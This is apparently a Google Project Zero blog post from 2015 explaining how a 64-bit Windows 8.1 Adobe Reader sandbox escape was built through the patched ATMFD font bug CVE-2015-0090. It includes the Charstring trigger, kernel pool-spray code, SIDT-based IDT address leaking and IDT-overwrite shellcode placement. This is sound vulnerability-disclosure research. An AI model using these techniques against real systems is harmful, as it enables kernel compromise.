Friday, August 21, 2015

One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation

Posted by Mateusz Jurczyk of Google Project Zero

This is the final part #4 of the “One font vulnerability to rule them all” blog post series. In the previous posts, we introduced the “blend” PostScript operator vulnerability and successfully used it to first exploit Adobe Reader, and later escape the sandbox on 32-bit builds of Windows 8.1 by repeating the attack against the kernel with a modified ROP chain and payload:


Today, we will complete the proof of concept exploit by adding support for a sandbox escape working on 64-bit builds of Windows 8.1, and provide some closing thoughts regarding the Charstring vulnerability research, as well as font security in general.

Exploitation of Microsoft Windows 8.1 Update 1 (64-bit)

As previously mentioned, 64-bit Windows platforms were unaffected by the BLEND vulnerability, making it impossible to use it for a sandbox escape. However, in order to make our proof of concept fully universal and also demonstrate the impact of other issues discovered during the Charstring research, we can take advantage of one of them in the x64 scenario. The three other flaws in ATMFD.DLL potentially allowing arbitrary code execution are listed below:

  1. CVE-2015-0090 – a read/write-what-where condition via an uninitialized pointer from the kernel pools.
  2. CVE-2015-0091 – a controlled pool-based buffer overflow of a constant-sized allocation.
  3. CVE-2015-0092 – a ≤ 64 byte pool-based buffer underflow of an arbitrarily-sized allocation.

While pool corruption vulnerabilities are still exploitable in the Windows kernel, they are typically rather “inconvenient” to use for attackers, require a lot of work and might be unreliable if the internal state of the pools is not sufficiently controlled. Exploitation of such bugs using universal methods (attacking pool metadata) was also made much more difficult by Microsoft, which introduced a number of pool exploit mitigations in Windows 7, 8 and 8.1. On the other hand, the CVE-2015-0090 issue seemed easier to use, as controlling uninitialized memory via pool spraying is more reliable and safer than corrupting the pools, and secondly, the resulting read/write-what-where primitive is much more powerful and convenient to use for the actual elevation of privileges. As a result, I decided to focus on this specific bug for the x64 sandbox escape part of the proof of concept exploit. The subsection below explains the root cause and other details of the vulnerability.

The Registry Object vulnerability (CVE-2015-0090)


In addition to the two standard methods of storing data available to Charstring programs (the operand stack and the transient array), the “Type 2 Charstring Format” specs from 1998 (the same revision that introduced the “blend” operator) also defined a completely new one related to the multiple masters functionality, called the “Registry Object”. While it was subsequently removed in 2000 together with all other OpenType/MM functionality, it is still supported by ATMFD.DLL.

The registry object can be referenced by two dedicated, complementary instructions called “store” and “load”, which transfer data back and forth between the transient array and the Registry. The storage was described in the specification in the following way:


The Registry provides more permanent storage for a number of items that have predefined meanings. The items stored in the Registry do not persist beyond the scope of rendering a font. Registry items are selected with an index, thus:

0 Weight Vector
1 Normalized Design Vector
2 User Design Vector
The result of selecting a Registry item with an index outside this list is undefined.

The absolute maximum number of elements for these items are:
Weight Vector 16
Normalized Design Vector 15
User Design Vector 15
The result of accessing an element of an item beyond the absolute maximum number of elements for an item is undefined. The result of accessing an element of an item beyond the actual range for a particular font is undefined.

As shown above, the document also conveniently hints where things might go wrong in the interpreter if the specified limits are not properly enforced.

Internally in ATMFD, the three registry items are implemented as an array of REGISTRY_ITEM structures (I came up with the name and reverse-engineered the format), which reside in a global font state structure used by the driver to store various information regarding the overall font object:

struct REGISTRY_ITEM {
 long size;
 void *data;
} Registry[3];

The index of the registry item (0, 1 or 2) was in fact sanitized before usage with the following snippet of code:

.text:000000000004A249                 cmp     r8d, 3
.text:000000000004A24D                 ja      loc_495FC

Can you spot the bug? The code actually verifies an “index > 3” condition and bails out if it is true, while in fact it should check for “index >= 3”. This off-by-one error makes it possible for the Charstring to reference an illegal registry item of index 3. More technically speaking, it enables us to trigger the following “memcpy” function calls with controlled data in the transient array and size of the operation, using the “load” and “store” instructions respectively:

memcpy(Registry[3].data, transient array, controlled size);
memcpy(transient array, Registry[3].data, controlled size);

provided that the signed value of the Registry[3].size field is positive.

As previously mentioned, the registry array is part of an overall font state structure, which means that the out-of-bounds entry at index 3 occupies the memory of whatever object is defined directly after the array. While the exact definition of the structure is unknown due to the closed source nature of the driver, we have observed that the Registry[3] structure is in fact uninitialized during the run time of the interpreter, meaning that both the “size” and “data” fields contain old bytes that were previously part of another pool allocation. Exploitation wise, if we were able to spray the kernel pools with controlled bytes such that Registry[3].size and Registry[3].data overlapped with our previous allocation, we would end up with arbitrary read and write capabilities in the Windows kernel.

In the Charstring, the condition can be triggered with the following sequence of instructions:
/a ## -| { 3 0 0 1 store } |-

where:

  • 3 is the out-of-bound registry index, the culprit of the bug,
  • 0 is the offset relative to the start of the registry item,
  • 0 is the offset relative to the start of the transient array,
  • 1 is the number of 32-bit words to copy,
  • store is the vulnerable instruction.

Kernel pool spraying in Windows for the purpose of exploiting use-after-free or use of uninitialized memory conditions is an easy task, even in the latest editions of the operating system. Tarjei Mandt performed some extensive research in this area in the context of Windows 7 [1], devising methods for controlling the state of various pool types. For “Session Paged Pools”, which is where the font object structure is allocated from, he proposed the usage of a SetClassLongPtr USER function to set the unicode name of a menu object, resulting in a kernel allocation of an arbitrary size and content:

SetClassLongPtrW(hwnd, GCLP_MENUNAME, (LONG)lpBuffer);

As it turns out, the technique still works just fine in Windows 8.1 – we only have to determine the right sequence of allocations to make sure that one of them will be reused by ATMFD for the font object structure. Practical experiments have shown that triggering allocations of an increasing size between 1000 and 4000 bytes for 100 times reliably fills the uninitialized REGISTRY_ITEM structure in all tested environments:

for (UINT i = 0; i < 100; i++) {
 for (UINT j = 500; j < 2000; j++) {
   SpraySessionPoolMemory(hwnd,
                          j * 2,
                          0x0101010101010101LL,
                          0xFFFFFFFFDEADBEEFLL);
 }
}

While we believe the algorithm shown above to reliably cause Registry[3].size to reuse the value 0x0101010101010101 and Registry[3].data to reuse the value 0xFFFFFFFFDEADBEEF, if it happens not to be the case for whatever reason, then the font loading will still just cleanly fail if the incidental value of “size” is not positive (a condition checked by ATMFD before copying any memory), or if the value of “data” is a user-mode address (due to the aggressive exception handling used by the driver, as discussed in the previous section) – an actual bugcheck can only occur upon access to an invalid kernel-mode memory. This behavior makes it potentially possible to retry the exploitation multiple times, however it shouldn’t really be necessary considering the high degree of reliability provided by the pool spraying procedure.

Once the spraying completes and a font containing the above Charstring program triggering the vulnerability is loaded, we can observe the following system bugcheck, illustrating that the kernel indeed tried to write data to the address we have used in the pool spraying phase:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffffdeadbef2, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000adcc6a, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000002, (reserved)

With the read/write-what-where condition at our disposal, we now have to decide what we are going to read or write, keeping in mind our goal of subverting all existing exploit mitigations available on the attacked Windows 8.1 platform. The question is not exactly trivial to answer, as Microsoft has gone into great lengths to disable all sources of kernel address space information available to Low Integrity processes in Windows 8 and 8.1 – and we don’t really want to use yet another bug to get the necessary information leak.

Fortunately, there are still some sources of kernel address space information that Windows doesn’t block, such as information provided directly by the CPU which cannot easily be faked or protected without special capabilities (e.g. hypervisor mode). Two such sources of information are the “SIDT” and “SGDT” instructions, which return the addresses and lengths of the special “Interrupt Descriptor Table” and “Global Descriptor Table” processor structures residing in kernel memory. These instructions are available in both user in kernel mode by default and cannot be disabled or restricted (even from ring-0), thus providing a very convenient anti-ASLR primitive.

As the two structures are initialized at a very early stage of the system start up for CPU #0, we can expect them to have a rather “regular” form and/or be located at predictable locations relative to each other. As shown in Figure 1, this is indeed the case – the GDT structure of size 0x80 is directly followed by IDT of size 0x1000 (256 entries, each 16 bytes long), and since they occupy 0x1080 bytes in total, the subsequent 0xF80 bytes before the page boundary are unused.


Figure 1. The relative placement of GDT and IDT structures for CPU #0 on Windows 8.1 64-bit.

There are several reasons why the structures can be especially useful from the exploitation angle. For one, IDT is full of function pointers by design:

0: kd> !idt
Dumping IDT: fffff801d6acf080
00:  fffff801d5167900 nt!KiDivideErrorFault
01:  fffff801d5167a00 nt!KiDebugTrapOrFault
02:  fffff801d5167bc0 nt!KiNmiInterrupt
03:  fffff801d5167f40 nt!KiBreakpointTrap
04:  fffff801d5168040 nt!KiOverflowTrap
05:  fffff801d5168140 nt!KiBoundFault
[…]

Some of the interrupts are user-facing, i.e. they can be invoked from user-mode. These include low IDT entries being standard CPU exception handlers (not especially safe to tamper with, as other processes or the kernel might also trigger them unexpectedly), but also a handful of entries designed to be used specifically from ring-3, such as nt!KiRaiseSecurityCheckFailure (IDT 0x29), nt!KiRaiseAssertion (IDT 0x2C) or nt!KiDebugServiceTrap (IDT 0x2D). Another potential issue might be the fact that function pointers are partitioned across the IDT entry, interlaced by other flags and values, as shown in Figure 2.

Figure 2. 64-bit IDT entry descriptors
(source: Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3A: System Programming Guide, Part 1)

The pointer partitioning should not be much of a problem though, as it could be probably handled by a few arithmetic instructions in the Charstring program. Better yet, we could also just find a “trampoline” gadget of the form “JMP REG” in the direct vicinity (same memory page) of the overwritten handler, which should then only require modifying the low 16 bits of the address and also be fully reliable against ASLR.

The other extremely interesting and useful fact about the GDT/IDT memory area are its access rights, which are set to Read/Write/Execute, as shown below in a WinDbg listing:

0: kd> !pte idtr
VA fffff801d6acf080
[...] PTE at FFFFF6FC00EB5678
[...] contains 00000000048CF163
[...] pfn 48cf   -G-DA—KWEV

As a result, we can freely store out payload in the 0xF80 unused bytes following IDT, and execute it from there! Now, all the pieces start to come together. :-)

As we are attacking a 64-bit kernel, the IDT address is likewise 64-bit. However, the 2nd stage DLL obviously runs in the 32-bit Compatibility Mode, and thus the SIDT instruction executed in such context would only provide us with 32 bits of the desired address. In order to get it in full, we must temporarily transfer to Long Mode, execute the one necessary instruction and immediately return back to Compatibility Mode. Both transfers are very simple to achieve, as they only take a single far call to code segment (cs: register) 0x33 for the 64-bit mode, and code segment 0x23 for the 32-bit mode.

The following helper C++ macros for Visual Studio were developed by ReWolf to facilitate the task [2]:

#define EM(a) __asm __emit (a)
#define X64_Start_with_CS(_cs) { \
EM(0x6A) EM(_cs)                 /*  push   _cs                  */ \
EM(0xE8) EM(0) EM(0) EM(0) EM(0) /*  call   $+5                  */ \
EM(0x83) EM(4) EM(0x24) EM(5)    /*  add    dword [esp], 5       */ \
EM(0xCB)                         /*  retf                        */ \
}
#define X64_End_with_CS(_cs) { \
EM(0xE8) EM(0) EM(0) EM(0) EM(0) /*  call   $+5                  */ \
EM(0xC7) EM(0x44) EM(0x24) EM(4) /*                              */ \
EM(_cs) EM(0) EM(0) EM(0)        /*  mov    dword [rsp + 4], _cs */ \
EM(0x83) EM(4) EM(0x24) EM(0xD)  /*  add    dword [rsp], 0xD     */ \
EM(0xCB)                         /*  retf                        */ \
}
#define X64_Start() X64_Start_with_CS(0x33)
#define X64_End() X64_End_with_CS(0x23)

By making use of them, we can now obtain the full address of IDT using the following short C++ function:

ULONGLONG sidt() {
#pragma pack(push, 1)
 struct {
   USHORT limit;
   ULONGLONG address;
 } idtr;
#pragma pack(pop)
 X64_Start();
 __sidt(&idtr);
 X64_End();
 return idtr.address;
}

With this, we now have all the puzzles in place, and can implement the final exploit by following the following steps in the 2nd stage DLL:

  1. Make sure that the thread is running on CPU #0 using the SetThreadAffinityMask API.
  2. Spray the Session Paged Pool with Registry[3].size set to 0x0101..., and Registry[3].data set to the IDT address.
  3. Load the kernel exploit font.

The rest of the exploitation process takes places inside of the Charstring program in the font, which performs the following actions:

  1. Copy the entire IDT to the transient array.
  2. Adjust entry 0x29 (nt!KiRaiseSecurityCheckFailure) to an address of a “JMP R11” gadget residing in the same memory page, and write it back to IDT.
  3. Save the modified part of IDT[0x29] at IDT+0x1100 in order to restore it later on.
  4. Write the kernel-mode elevation of privileges shellcode at IDT+0x1104.

The “KiRaiseSecurityCheckFailure” interrupt was chosen for the irony of it – here, we’re using a mechanism designed to mitigate vulnerability exploitation to compromise the operating system. :-) The steps taken by the font are illustrated in the following animation:

Once the Charstring program execution completes, our environment is fully set up – the only remaining steps are to trigger the execution of the kernel-mode shellcode installed in memory past the IDT and finish the job:

  1. Switch to Long Mode and trigger Interrupt 0x29 with the R11 register set to IDT+0x1104 (the shellcode address).
    1. The shellcode restores the original IDT[0x29] entry, elevates all “AcroRd32.exe” process privileges and increases the active process limit using the algorithm described in the 32-bit kernel exploitation section.
  2. Unhook the KERNELBASE!CreateProcessA function.
  3. Spawn calc.exe.

A working exploit successfully escaping the Adobe Reader sandbox via the CVE-2015-0090 vulnerability is presented in the video below:



Final thoughts

Mission accomplished! We have successfully created a single, 100% reliable PDF file launching an elevated calc.exe upon opening with Adobe Reader 11.0.10 on Windows 8.1 Update 1 x86 and x64. To sum up, we have managed to bypass the following exploit mitigations along the way:

  • Stack cookies – thanks to the arbitrary, non-continuous stack read/write primitive provided by the BLEND vulnerability, we have never touched any stack cookies during the exploitation process.
  • ASLR – the exploit is based solely on addresses calculated off data reliably leaked or requested from the CPU.
  • DEP – all stages ran in executable memory (through ROP or otherwise).
  • Sandboxing – escaped by using the same (x86) or related (x64) vulnerability.
  • SMEP – kernel-mode payload executed in the kernel address space.

We have also maintained complete reliability along the process, as no brute-forcing or guessing was involved; instead, all stages were fully deterministic (with the small exception of kernel pool spraying in the x64 sandbox escape, which we still consider extremely reliable).

Performing the Charstring security research was an interesting exercise, as it distinctly showed that even despite the seemingly large amount of attention from the security community, font vulnerabilities are still not extinct, but rather quite the opposite (the latest example being yet another ATMFD vulnerability discovered in the Hacking Team leaked data dump). Considering the extent of font format functionality and complexity (which are still being extended in order to accommodate modern users’ needs), we find it likely that fonts will be an attractive target for the foreseeable future. The impact of font vulnerabilities could still be greatly reduced in many areas, for example by removing font processing from all privileged security contexts (such as the operating system kernel). We applaud Microsoft for introducing a number of font-related mitigations in the upcoming Windows 10, such as the usage of low integrity userland font drivers.

The research also shows that certain portions of native code can still be shared between various high-profile software today, even between client applications and operating systems. Such situations may have a number of negative consequences on software security, worst of which being the scenario discussed in this post – a single vulnerability affecting a number of targets, enabling adversaries to attack many targets simultaneously or chain exploits to compromise machines with just one bug. While this is definitely not a common situation, sometimes it is worthwhile to study the history of software and file format development, as it may uncover interesting or surprising connections between pieces of software we run on our computers today, or indicate the most promising areas for research (e.g. obsolete, deprecated or forgotten file format features implemented decades ago).

Lastly, the BLEND vulnerability demonstrates that even in 2015, the era of high-quality mitigations and security mechanisms, one good bug providing the right set of primitives can still suffice to fully compromise a system.

I hope you enjoyed the series, and stay tuned for more font-related blog posts soon! :-)

References


1 comment:

  1. Great series!

    Meta question: what do you use to display syntax-highlighted code in your blog?

    ReplyDelete